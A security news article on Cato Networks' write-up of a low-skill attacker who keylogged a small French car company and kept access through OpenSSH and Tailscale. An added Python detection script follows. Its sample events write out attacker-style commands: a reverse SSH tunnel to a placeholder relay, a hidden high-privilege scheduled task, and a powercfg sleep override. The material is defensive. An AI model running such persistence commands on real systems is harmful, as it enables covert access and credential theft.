A French-speaking hacker infiltrated a small French automotive company, deployed a keylogger, and made off with banking and email login details.
Nothing unusual there — until one particular step near the end of the attack changed everything.
Just before his command-and-control server was shut down, he installed OpenSSH and Tailscale on a compromised machine, creating an alternative access route that bypassed the C2 entirely. When the Havoc server went offline the following day, his connection to the victim’s system remained intact. Eighteen days later, when the C2 came back online, his agents reconnected on their own, and he simply picked up where he left off.
Cato Networks documented the entire operation command by command — 339 commands across 33 days — after the attacker accidentally left his SSH keys and a detailed step-by-step guide in a publicly accessible storage bucket. The analysis, published Tuesday by Cato CTRL researcher Vitaly Simonovich, offers a rare window into an intrusion seen through the attacker’s own keystrokes rather than through post-incident forensic artifacts.
The researchers’ takeaway is stark: taking down a C2 server does not equal remediation if the attacker has already established a separate backdoor.
The threat actor, who goes by the handle “Poisson,” is not an advanced persistent threat. Researchers describe a novice operator who appears to work around a school schedule, active after 3 p.m. CET with a long break in the middle of the day. Everything ran on free-tier infrastructure: DuckDNS, Backblaze B2, and a low-cost IONOS VPS hosted in Berlin. His operational security was weak.
He exposed his home directory five times, named his storage buckets after his own handle, and left a test file containing his own repeated keystrokes inside the keylogger package. He failed at roughly half of what he attempted. Still, he managed to compromise four machines.
The attack chain
The malware operated almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which then fetched a .NET loader that executed Havoc’s Demon agent without ever writing the implant to disk. For privilege escalation, he used Start-Process -Verb RunAs — not a silent UAC bypass. It triggers the Windows consent prompt and waits for a user to click Yes. On one victim machine, it took twelve attempts over two days before someone approved it.
After gaining elevated access, he cemented his foothold: a scheduled task configured to run at every logon with the highest privileges, shellcode injected into Explorer.exe, and a custom-compiled RustDesk binary serving as a backup communication channel. The credential harvester was a 70-line Python keylogger that saved keystrokes to a local file, with no beacon and no exfiltration server. Poisson simply logged in, retrieved the file manually, and ran powercfg to prevent the machines from going to sleep, ensuring the credential collection never paused.
The critical maneuver
On April 7, during a five-hour overnight session, he installed OpenSSH Server and Tailscale, connected the victim’s machine to his private Tailscale network, and configured key-based SSH authentication along with a reverse tunnel. This gave him the ability to reach the machine through Tailscale’s encrypted mesh network — no C2 required, no exposed ports needed.
The following day, the Havoc infrastructure went dark. Cato did not disclose the reason, and it hardly matters: the Tailscale pathway existed on an entirely separate network, so the access survived.
When the C2 was restored on April 26, the agents reconnected automatically with no need to re-compromise the machines. Over the final five days, he executed 145 additional commands, probed smart-card and certificate stores — suggesting he was targeting certificate-based authentication — ran two unidentified executables from an archive named Thales.zip for roughly 32 minutes total, then deleted 17 files and went silent on May 1.
His objectives were narrowly focused. There was no Mimikatz, no lateral movement across the network, no ransomware, and no indication he exfiltrated the documents he browsed — ranging from tax records to insurance files. He was only after what people type: banking credentials, email passwords, government portal logins. For a small business owner, that translates directly into financial risk.
None of the tools involved are novel, which is precisely the point. China’s APT31 leveraged Tailscale throughout 2024 and 2025 to quietly tunnel out of Russian IT companies. Scattered Spider has relied on legitimate remote-access utilities like Ngrok and Fleetdeck. And RustDesk, Poisson’s backup channel, has appeared in recent Akira ransomware campaigns.
The binaries are digitally signed and entirely legitimate, so detection strategies that focus on malicious files rather than malicious behavior will miss them entirely. What Poisson’s case adds is command-level evidence that this technique survives a takedown — demonstrated by an attacker who was clearly still learning on the job.
What to monitor
Cato’s detection recommendations are specific:
- Trigger an alert when OpenSSH Server is installed on a Windows workstation — this is rarely legitimate in that context.
- Watch for tailscale.exe on machines that have no business running a VPN client.
- Look for ssh -R reverse tunnels connecting to external hosts.
- Check for wscript.exe executing .vbs files from user staging directories.
- Flag scheduled tasks configured with the highest privileges that launch script interpreters.
- Monitor for powercfg standby-timeout modifications that keep machines from entering sleep mode.
- Block DuckDNS domains.
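As an added worked example (not Cato's detection content or any vendor's rule set), the following Python turns each of the seven recommendations above into one check and runs the checks over constructed endpoint telemetry. The event schema is loosely modelled on Sysmon process-creation and DNS-query records, the sample host, user, task and domain names are invented placeholders, and the command-line patterns are the generic forms of the commands the article names (Add-WindowsCapability/DISM for OpenSSH Server, schtasks /RL HIGHEST, powercfg standby-timeout). It also serves the closing point about hunting for the persistence layer behind a C2: the same checks can be replayed over historical logs after a takedown.

```python
"""Rule-based triage of Windows endpoint events for the persistence techniques
described in the article. Added example with a constructed event schema and
constructed sample records; not Cato's detection logic."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record (constructed schema, Sysmon-like)."""
    kind: str           # "process" or "dns"
    image: str = ""     # full path of the executable that started
    cmdline: str = ""   # command line as logged
    user: str = ""      # account the process ran under
    query: str = ""     # queried name, for kind == "dns"


def _exe(e: Event) -> str:
    """Basename of the image path, lower-cased."""
    return e.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _cmd(e: Event) -> str:
    """Command line lower-cased with whitespace collapsed, for substring checks."""
    return " ".join(e.cmdline.lower().split())


# Per-user locations where a dropped .vbs stager would typically sit.
USER_STAGING = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\temp\\", re.I)
INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "cmd.exe")


def openssh_server_install(e: Event) -> bool:
    """OpenSSH Server capability being added (PowerShell cmdlet or DISM)."""
    c = _cmd(e)
    return e.kind == "process" and "openssh.server" in c and (
        "add-windowscapability" in c or "/add-capability" in c)


def tailscale_present(e: Event) -> bool:
    """Tailscale client or daemon executing at all; whitelist known VPN hosts upstream."""
    return e.kind == "process" and _exe(e) in ("tailscale.exe", "tailscaled.exe")


def ssh_reverse_tunnel(e: Event) -> bool:
    """ssh.exe started with a remote forward (-R is case-sensitive in OpenSSH)."""
    return (e.kind == "process" and _exe(e) == "ssh.exe"
            and re.search(r"(?:^|\s)-R\s*\S+:\d+", e.cmdline) is not None)


def vbs_from_user_dir(e: Event) -> bool:
    """Script host running a .vbs file out of a per-user staging directory."""
    c = _cmd(e)
    return (e.kind == "process" and _exe(e) in ("wscript.exe", "cscript.exe")
            and ".vbs" in c and USER_STAGING.search(c) is not None)


def highest_priv_task_with_interpreter(e: Event) -> bool:
    """Scheduled task created at highest run level whose action is a script interpreter."""
    c = _cmd(e)
    if e.kind != "process":
        return False
    created = (("schtasks" in c and "/create" in c and "/rl highest" in c)
               or ("-runlevel highest" in c
                   and ("register-scheduledtask" in c or "new-scheduledtaskprincipal" in c)))
    return created and any(i in c for i in INTERPRETERS)


def powercfg_sleep_change(e: Event) -> bool:
    """powercfg altering the standby timeout (keeps a harvester running)."""
    return e.kind == "process" and _exe(e) == "powercfg.exe" and "standby-timeout" in _cmd(e)


def duckdns_lookup(e: Event) -> bool:
    """DNS resolution of any DuckDNS subdomain."""
    return e.kind == "dns" and e.query.lower().rstrip(".").endswith(".duckdns.org")


RULES = [(f.__name__, f) for f in (openssh_server_install, tailscale_present, ssh_reverse_tunnel,
                                   vbs_from_user_dir, highest_priv_task_with_interpreter,
                                   powercfg_sleep_change, duckdns_lookup)]


def triage(events):
    """Return (rule name, event) for every hit; one event may hit several rules."""
    return [(name, ev) for ev in events for name, check in RULES if check(ev)]


def rules_fired(events):
    """Sorted, de-duplicated names of the rules that fired over the events."""
    return sorted({name for name, _ in triage(events)})


# Constructed sample telemetry: seven records that should fire, three benign ones that should not.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -Command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0", r"WS01\alice"),
    Event("process", r"C:\Program Files\Tailscale\tailscale.exe", "tailscale up --authkey AUTHKEY-PLACEHOLDER", r"WS01\alice"),
    Event("process", r"C:\Windows\System32\OpenSSH\ssh.exe",
          r"ssh -N -R 2222:localhost:22 -i C:\Users\alice\.ssh\id_ed25519 relay@EXAMPLE-RELAY", r"WS01\alice"),
    Event("process", r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.vbs"', r"WS01\alice"),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          r'schtasks /Create /TN "Updater" /SC ONLOGON /RL HIGHEST /TR "powershell -w hidden -f C:\Users\alice\AppData\Roaming\u.ps1"', r"WS01\alice"),
    Event("process", r"C:\Windows\System32\powercfg.exe", "powercfg /change standby-timeout-ac 0", r"WS01\alice"),
    Event("dns", query="example-host.duckdns.org"),
    Event("process", r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Program Files\Vendor\logon.vbs"', "SYSTEM"),
    Event("process", r"C:\Windows\System32\schtasks.exe", r'schtasks /Create /TN "Backup" /SC DAILY /TR "C:\Program Files\Backup\backup.exe"', "SYSTEM"),
    Event("dns", query="login.microsoftonline.com"),
]

if __name__ == "__main__":
    for name, ev in triage(SAMPLE_EVENTS):
        print(f"{name:36s} {ev.user or '-':12s} {ev.cmdline or ev.query}")
```

Each rule is deliberately narrow (one technique, one string pattern) so that a hit is explainable to an analyst; in production the tailscale and OpenSSH checks need an allow-list of hosts where those tools are sanctioned, and the ssh -R check should additionally compare the destination host against your own address space.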
The broader lesson: when you discover a C2, assume it is not the only entry point, and actively search for the quiet persistence layer operating behind it.
What was inside Thales.zip, and what those two programs actually did during their 32 minutes on the machine, is the question Cato leaves unanswered. The more important realization is this: the C2 was never the intrusion itself — it was merely one pathway into it. Shut it down while leaving OpenSSH, Tailscale, the scheduled task, and the keylogger intact, and the attacker still has a way back in.
That is the part remediation efforts keep getting wrong.